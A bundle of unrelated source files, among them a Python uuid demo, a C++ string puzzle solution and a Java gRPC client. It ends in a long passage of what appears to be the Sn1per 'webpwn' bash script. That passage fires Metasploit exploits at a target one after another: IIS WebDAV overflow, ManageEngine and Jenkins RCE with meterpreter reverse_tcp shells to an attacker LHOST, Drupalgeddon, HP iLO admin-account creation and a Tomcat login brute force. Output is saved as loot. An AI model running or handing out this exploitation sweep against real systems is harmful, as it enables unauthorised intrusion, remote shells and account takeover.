              TRANSPORTATION_COMMERCIAL_LICENSE_TYPE = 1036

              # Question: "Interested in booking an event?"
              # Category: "Travel"
              EVENT_BOOKING_INTEREST = 1038

              # Question: "What is your destination country?"
              # Category: "Travel"
              DESTINATION_COUNTRY = 1039

              # Question: "What is your destination city?"
              # Category: "Travel"
              DESTINATION_CITY = 1040

              # Question: "What is your departure country?"
              # Category: "Travel"
              DEPARTURE_COUNTRY = 1041

              # Question: "What is your departure city?"
              # Category: "Travel"
              DEPARTURE_CITY = 1042

              # Question: "What is your departure date?"
              # Category: "Travel"
              DEPARTURE_DATE = 1043

              # Question: "What is your return date?"
              # Category: "Travel"
              RETURN_DATE = 1044

              # Question: "How many people are you traveling with?"
              # Category: "Travel"
              NUMBER_OF_TRAVELERS = 1045

              # Question: "What is your travel budget?"
              # Category: "Travel"
              TRAVEL_BUDGET = 1046

              # Question: "Where do you want to stay during your travel?"
              # Category: "Travel"
              TRAVEL_ACCOMMODATION = 1047
            end
          end
        end
      end
    end
  end
end
|
<filename>lang/py/pylib/code/uuid/uuid_uuid_objects.py
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 <NAME> All rights reserved.
#
"""
"""
__version__ = "$Id$"
#end_pymotw_header
import uuid
def show(msg, l):
    # Print a heading, then each value of `l` indented on its own line,
    # followed by a blank separator line. (Python 2 print statements;
    # the trailing comma after the string literal adds a space before v.)
    print msg
    for v in l:
        print '   ', v
    print
# Three textual forms that uuid.UUID() accepts for the same kind of value:
# URN form, braced hex digits, and plain hyphenated hex.
input_values = [
    'urn:uuid:f2f84497-b3bf-493a-bba9-7c68e6def80b',
    '{417a5ebb-01f7-4ed5-aeac-3d56cd5037b0}',
    '2115773a-5bf1-11dd-ab48-001ec200d9e0',
]

show('input_values', input_values)

# Parse each string into a uuid.UUID object.
uuids = [ uuid.UUID(s) for s in input_values ]
show('converted to uuids', uuids)

# UUID objects support ordering, so the list can be sorted in place.
uuids.sort()
show('sorted', uuids)
|
<reponame>tdm1223/Algorithm<gh_stars>1-10
// 9933. 민균이의 비밀번호
// 2019.05.22
// 문자열 처리
#include<iostream>
#include<vector>
#include<string>
#include<algorithm>
using namespace std;
// 문자열 거꾸로
// Return a reversed copy of `input`.
// Takes the argument by const reference: the function never modifies it,
// and this also allows const strings and temporaries to be passed
// (the original non-const reference rejected both). Existing callers
// passing non-const lvalues are unaffected.
string rev(const string &input)
{
    string tmp(input);
    reverse(tmp.begin(), tmp.end());
    return tmp;
}
// BOJ 9933: read n words, find the "password" — the word whose reversal
// also appears in the list — and print its length and middle character.
int main()
{
    int n;
    cin >> n;
    vector<string> v(n);
    for (int i = 0; i < n; i++)
    {
        cin >> v[i];
    }
    string ans;
    // Compare every word's reversal against every word; the problem
    // guarantees the answer is unique (a palindrome matches itself).
    for (int i = 0; i < v.size(); i++)
    {
        string tmp = rev(v[i]);
        for (int j = 0; j < v.size(); j++)
        {
            if (tmp == v[j])
            {
                ans = v[i];
                break;
            }
        }
    }
    // Print the result: length and middle character.
    cout << ans.size() << " " << ans[ans.size() / 2] << endl;
    return 0;
}
|
var stgr;
stgr = stgr || {};

// Builds the client-side model (stgr.model) from the `/list` endpoint.
// Depends on jQuery ($.ajax) and underscore/lodash (_.each).
stgr.modelBuildr = (function() {
  'use strict';
  var getData, init, _collateProperties;

  // Entry point: fetch the server list and invoke `callback` when done.
  init = function(callback) {
    if (callback == null) {
      callback = function() {};
    }
    return getData(callback);
  };

  // Fetch the verbose server list over AJAX and populate stgr.model.
  // On failure the model is reset to empty objects; `callback` runs in
  // both the success and failure cases.
  getData = function(callback) {
    var request;
    if (callback == null) {
      callback = function() {};
    }
    request = $.ajax({
      url: 'http://' + window.location.hostname + ':7847/list?verbose=true'
    });
    request.done(function(data) {
      stgr.model = {
        settings: {
          lastChange: data.lastChange
        },
        servers: data.data,
        properties: _collateProperties(data.data)
      };
      return callback();
    });
    return request.fail(function(data) {
      stgr.model = {
        settings: {},
        servers: {},
        properties: {}
      };
      return callback();
    });
  };

  // Group server names by each server's `property` field:
  // { propertyName: [serverName, ...], ... }
  _collateProperties = function(servers) {
    var propertyObj;
    propertyObj = {};
    _.each(servers, function(serverData, server) {
      propertyObj[serverData.property] = propertyObj[serverData.property] || [];
      return propertyObj[serverData.property].push(server);
    });
    return propertyObj;
  };

  // Public API.
  return {
    init: init,
    getData: getData
  };
})();
|
// Drop all tracked work by replacing both lists with fresh empty arrays.
export function clearWorks (state) {
  Object.assign(state, { active: [], inactive: [] })
}
// Record a proposal in the active work list (mutates the existing array).
export function addActive (state, proposal) {
  const activeList = state.active
  activeList.push(proposal)
}
// Record a proposal in the inactive work list (mutates the existing array).
export function addInactive (state, proposal) {
  const inactiveList = state.inactive
  inactiveList.push(proposal)
}
|
package org.ship.core.vo.engine;
import io.grpc.ManagedChannel;
import io.grpc.ManagedChannelBuilder;
import org.dataship.rpc.DatashipGrpc;
import org.dataship.rpc.Rpc;
import org.ship.core.util.Utils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.concurrent.TimeUnit;
/**
* Created by wx on 2017/5/8.
*/
public class EngineClient {
    private static final Logger log = LoggerFactory.getLogger(EngineClient.class);

    /** gRPC channel to the dataship engine. */
    private final ManagedChannel channel;
    /** Blocking stub used for all RPC calls. */
    private final DatashipGrpc.DatashipBlockingStub blockingStub;

    /**
     * Construct client connecting to HelloWorld server at {@code host:port}.
     * */
    public EngineClient(String host, int port) {
        this(ManagedChannelBuilder.forAddress(host, port)
                // Channels are secure by default (via SSL/TLS). For the example we disable TLS to avoid
                // needing certificates.
                .usePlaintext());
    }

    /**
     * Construct client for accessing RouteGuide server using the existing channel.
     */
    EngineClient(ManagedChannelBuilder<?> channelBuilder) {
        channel = channelBuilder.build();
        blockingStub = DatashipGrpc.newBlockingStub(channel);
    }

    /** Shut down the channel, waiting up to 5 seconds for in-flight calls. */
    public void shutdown() throws InterruptedException {
        channel.shutdown().awaitTermination(5, TimeUnit.SECONDS);
    }

    /** Convert a ConnRule to its protobuf form (shared by addRule/delRule). */
    private static Rpc.PbRule toPbRule(ConnRule rule) {
        return Rpc.PbRule.newBuilder().setId(rule.getId())
                .setType(Rpc.RuleType.forNumber(rule.getRuleType().getValue()))
                .setListenAddr(rule.getListenAddr().getIp())
                .setListenPort(rule.getListenPort())
                .setDstAddr(rule.getDstAddr())
                .setDstPort(rule.getDstPort())
                .setSendAddr(rule.getSendAddr().getIp())
                .build();
    }

    /** Convert an IpAddress to its protobuf form; the mask goes through Utils.shiftMask. */
    private static Rpc.PbAddr toPbAddr(IpAddress ipAddress) {
        int mask = Utils.shiftMask(ipAddress.getMask());
        return Rpc.PbAddr.newBuilder()
                .setIface(ipAddress.getIfaceName())
                .setIp(ipAddress.getIp())
                .setMask(mask)
                .build();
    }

    /** Convert a Route to its protobuf form; the mask goes through Utils.shiftMask. */
    private static Rpc.PbRoute toPbRoute(Route route) {
        int dstMask = Utils.shiftMask(route.getDstMask());
        return Rpc.PbRoute.newBuilder()
                .setDstNet(route.getDstNet())
                .setDstMask(dstMask)
                .setIface(route.getIfaceName())
                .setGateway(route.getGateway())
                .build();
    }

    /** Add a connection rule on the engine. */
    public Rpc.OpResult addRule(ConnRule rule) {
        return blockingStub.addRule(toPbRule(rule));
    }

    /** Delete a connection rule on the engine. */
    public Rpc.OpResult delRule(ConnRule rule) {
        return blockingStub.delRule(toPbRule(rule));
    }

    /** Add an interface address on the engine. */
    public Rpc.OpResult addAddr(IpAddress ipAddress) {
        log.debug("ipaddr:{}", ipAddress);
        return blockingStub.addAddr(toPbAddr(ipAddress));
    }

    /** Replace {@code oldAddr} with {@code newAddr} on the engine. */
    public Rpc.OpResult modAddr(IpAddress oldAddr, IpAddress newAddr) {
        Rpc.PbAddrMod pbAddrMod = Rpc.PbAddrMod.newBuilder()
                .setOld(toPbAddr(oldAddr))
                .setNew(toPbAddr(newAddr))
                .build();
        return blockingStub.modAddr(pbAddrMod);
    }

    /** Delete an interface address on the engine. */
    public Rpc.OpResult delAddr(IpAddress ipAddress) {
        return blockingStub.delAddr(toPbAddr(ipAddress));
    }

    /** Add a route on the engine. */
    public Rpc.OpResult addRoute(Route route) {
        return blockingStub.addRoute(toPbRoute(route));
    }

    /** Replace {@code oldRoute} with {@code newRoute} on the engine. */
    public Rpc.OpResult modRoute(Route oldRoute, Route newRoute) {
        Rpc.PbRouteMod pbRouteMod = Rpc.PbRouteMod.newBuilder()
                .setOld(toPbRoute(oldRoute))
                .setNew(toPbRoute(newRoute))
                .build();
        return blockingStub.modRoute(pbRouteMod);
    }

    /** Delete a route on the engine. */
    public Rpc.OpResult delRoute(Route route) {
        return blockingStub.delRoute(toPbRoute(route));
    }
}
|
# --- Sn1per "webpwn" Metasploit sweep --------------------------------------
# Optional Slack notification marking the start of the scan.
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per webpwn scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
# Each section below follows the same three-step pattern:
#   1. run a Metasploit module non-interactively (msfconsole -q -x), teeing raw output to loot
#   2. strip ANSI colour escape codes with sed into a clean .txt loot file
#   3. delete the raw capture
# NOTE(review): the double-quotes around $TARGET/$PORT/$SSL *inside* the -x
# strings actually close and reopen the outer quoted string, so the values are
# expanded unquoted by the shell; this only works for values without
# whitespace or glob characters — confirm callers guarantee that.
# JBoss vulnerability scanner.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JBOSS VULN SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/jboss_vulnscan; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw 2> /dev/null
# HTTP PUT upload scanner (tries default path, then /uploads/).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null
# WebDAV detection plus website content enumeration.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null
# IIS WebDAV ScStoragePathFromUrl buffer overflow exploit (CVE-2017-7269).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
# ManageEngine Desktop Central connectionId write RCE exploit.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING MANAGEENGINE DESKTOP CENTRAL RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/windows/http/manageengine_connectionid_write; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw 2> /dev/null
# Apache Tomcat enumeration.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT ENUMERATION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/tomcat_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw 2> /dev/null
# Tomcat manager login brute force (uses module default credential lists).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT MANAGER LOGIN BRUTEFORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/http/tomcat_mgr_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw 2> /dev/null
# Jenkins enumeration (default path, then root TARGETURI).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JENKINS ENUMERATION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/jenkins_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set TARGETURI /; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw 2> /dev/null
# Jenkins script console RCE, retried across several TARGET/PAYLOAD combinations.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JENKINS SCRIPT CONSOLE RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use multi/http/jenkins_script_console; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; setg SSL "$SSL"; set TARGET 0; run; set TARGETURI /; run; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set TARGET 1; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGET 2; set PAYLOAD linux/x64/meterpreter/reverse_tcp; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGETURI /; run; set TARGET 1; run; set TARGET 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw 2> /dev/null
# Tomcat UTF-8 directory traversal (CVE-2008-2938).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null
# Apache Optionsbleed scanner (CVE-2017-9798).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null
# HP iLO authentication bypass — creates an admin account if vulnerable.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw 2> /dev/null
# Elasticsearch MVEL dynamic scripting RCE (CVE-2014-3120).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw 2> /dev/null
# Drupalgeddon SQL injection (CVE-2014-3704), tried at / and /drupal/.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null
# MS15-034 HTTP.sys memory dump scanner.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING MS15-034 HTTP.SYS MEMORY LEAK EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null
# GlassFish admin directory traversal scanner.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 2> /dev/null
# BadBlue passthru buffer overflow exploit.
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw 2> /dev/null
# PHP CGI argument injection (CVE-2012-1823).
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null
# phpMyAdmin exploits: 3.5.2.2 backdoor, config write, preg_replace eval.
# BUG FIX: the third module path was misspelled "multi/htp/..." so it never
# loaded; corrected to "multi/http/phpmyadmin_preg_replace".
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
